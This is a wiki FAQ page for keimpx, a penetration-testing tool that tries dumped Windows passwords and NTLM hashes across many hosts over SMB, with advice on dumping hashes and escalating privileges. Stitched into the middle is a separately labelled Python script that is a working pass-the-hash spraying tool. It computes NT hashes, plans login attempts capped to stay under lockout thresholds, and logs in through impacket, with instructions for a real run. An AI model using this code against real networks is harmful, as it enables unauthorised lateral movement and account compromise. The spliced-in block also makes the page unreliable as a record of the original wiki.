inquisb edited this page Jun 26, 2012 · 1 revision

Frequently Asked Questions

What is this tool about

Please, refer to the README.

It basically takes in a single pair of credentials or a list of credentials (plain-text passwords, or NTLM hashes as output by password hash dumping tools) and a single host or a list of hosts. It then tries every combination of credentials and hosts to see where they work.

When is it useful?

It comes in handy when you are in front of a large Windows network during a penetration test, have owned one of the workstations (or a server) and want to check on which other systems you can log in with the dumped hashes or cracked plain-text passwords.

Is it a sniffer or a password cracker?

Neither of them. Refer to the previous answers.

Does it exploit any security vulnerability?

No, it is a post-exploitation tool.

Ok, but how do I get these password hashes?

Once you are a highly privileged user on a Windows system, you can dump users' password hashes from the Security Accounts Manager (SAM), LSA secrets, cached domain logon information, etc. Save all the dumped hashes to a text file and use it as the credentials file for this tool.
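To make concrete what "a list of credentials" and "combinations of user credentials and hosts" mean in practice, here is an added example in Python. It is not part of keimpx or this wiki. It assumes a credentials file whose lines are either user:password or pwdump-style user:RID:LMHASH:NTHASH:::, that the NT hash is MD4 over the UTF-16LE encoding of the password (so a cracked plain-text entry and the dumped hash it came from are the same credential for NTLM authentication and only need to be tried once), and, for the real login attempt only, that impacket is installed. The sample credentials and hosts are constructed.

```python
"""Normalise a keimpx-style credentials file and plan a pass-the-hash spray.

Added example (not keimpx code). Assumptions are labelled in comments.
"""
import struct
from itertools import product


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable on OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    bit_len = len(data) * 8
    # pad to 56 mod 64, then append the 64-bit little-endian bit length
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = h
        for fn, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = _lrot((a + fn(b, c, d) + X[j] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles: next step updates old d
        h = [(v + w) & 0xFFFFFFFF for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), hex-encoded (assumption stated in the lead-in)."""
    return md4(password.encode("utf-16-le")).hex()


def parse_credentials(text: str):
    """Return distinct (user, nthash, source) triples from a credentials file.

    Accepted line shapes (assumed format): "user:password" or pwdump
    "user:RID:LMHASH:NTHASH:::". Plain-text entries are reduced to their NT
    hash, so a password and the hash it cracks to count as one credential.
    """
    hexdigits = set("0123456789abcdefABCDEF")
    seen, creds = set(), []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) >= 4 and len(parts[3]) == 32 and set(parts[3]) <= hexdigits:
            user, nth, src = parts[0], parts[3].lower(), "hash"
        else:
            user, pwd = line.split(":", 1)  # password may itself contain ':'
            nth, src = nt_hash(pwd), "plain"
        key = (user.lower(), nth)
        if key not in seen:
            seen.add(key)
            creds.append((user, nth, src))
    return creds


def plan_spray(creds, hosts, max_per_user=None):
    """Host-major list of (host, user, nthash) attempts.

    max_per_user caps the distinct secrets tried per account on each host so a
    list of cracked candidates does not trip the domain lockout threshold.
    """
    plan = []
    for host in hosts:
        tried = {}
        for user, nth, _ in creds:
            n = tried.get(user.lower(), 0)
            if max_per_user is not None and n >= max_per_user:
                continue
            tried[user.lower()] = n + 1
            plan.append((host, user, nth))
    return plan


def try_smb_login(host, user, nthash, domain="", port=445, timeout=5):
    """Real pass-the-hash attempt over SMB using impacket (assumed installed).

    Only run this against systems you are authorised to test.
    """
    from impacket.smbconnection import SMBConnection
    conn = SMBConnection(host, host, sess_port=port, timeout=timeout)
    try:
        conn.login(user, "", domain, lmhash="", nthash=nthash)
        return True
    except Exception:
        return False
    finally:
        conn.close()


def spray(plan, login=try_smb_login):
    """Run the plan with the given login callable; return the (host, user) hits."""
    return [(host, user) for host, user, nth in plan if login(host, user, nth)]


# Constructed sample input: two SAM-dump lines plus two known plain-texts.
SAMPLE_CREDS = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# cracked: Administrator is "password", svc_backup has an empty password
Administrator:password
svc_backup:
"""
SAMPLE_HOSTS = ["10.0.0.5", "10.0.0.6"]  # constructed

if __name__ == "__main__":
    for host, user, nth in plan_spray(parse_credentials(SAMPLE_CREDS), SAMPLE_HOSTS, max_per_user=2):
        print(f"{host:<10} {user:<15} {nth}")
```

Running the script only prints the planned attempts; both plain-text lines collapse onto the dumped hashes, so two credentials are tried per host rather than four. Wire `spray(plan)` to `try_smb_login` for a real run, and set `max_per_user` from the target domain's lockout policy before spraying anything other than one hash per account.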

What if I am not a high privileged user on the Windows system?

As a penetration tester, you can escalate your privileges to Administrator or LOCAL SYSTEM before dumping the password hashes.

Aren't you reinventing the wheel?

As far as I know, there are three publicly available similar tools:

  • PsExec by Microsoft can be used to log in to a remote machine over SMB with a single user/password pair and execute commands. It is a single executable file and works on any Windows system. It does not natively offer the ability to log in by providing NTLM hashes.

  • smbshell by Tenable Security is a pre-compiled NASL script; it requires the nasl interpreter and a number of other Nessus libraries to run, which is not very convenient. Nevertheless, an advantage over PsExec is that it also accepts NTLM hashes. Like PsExec, it can be used to log in to one system at a time.

  • Metasploit's psexec exploit module can be used to log in to a remote machine over SMB with a single user/password or user/NTLM hash pair and execute commands. It is an enhanced version of the original standalone PsExec, but it requires direct network access between the attacker machine and the target network (you could always pivot traffic through the owned Windows system via a Meterpreter session route, though), which is not always feasible, for instance in a Citrix break-out where the back-end system is masked by a Citrix MetaFrame web interface. Like PsExec and smbshell, it can be used to log in to one system at a time unless a custom resource file is created to combine the smb_login auxiliary module with the psexec exploit module.

keimpx can be used to log in over SMB to a single target (like the previous tools) or to a list of targets, providing either a user/password pair (like the previous tools), a user/NTLM hash pair (like smbshell and Metasploit's psexec exploit module), or a list of the dumped hashes together with any passwords cracked from them. If valid credentials are found on any of the targets, it can be used to enumerate shares, users, domains and the password policy, list and deploy Windows services, execute operating system commands and, soon, access the Windows registry. Another advantage over smbshell and Metasploit's psexec exploit module is that it is a single Python script that requires only the Python interpreter to work; moreover, the tool can be converted into a single executable file, uploaded to the owned Windows system and run from there on the command line, like PsExec. The other advantage over all the other tools is that it is primarily meant to check which of a list of credentials, as user/password, user/NTLM hash and user/NTLM session token pairs, are valid across the whole Windows network.

More questions

If you have any question, feel free to contact me.
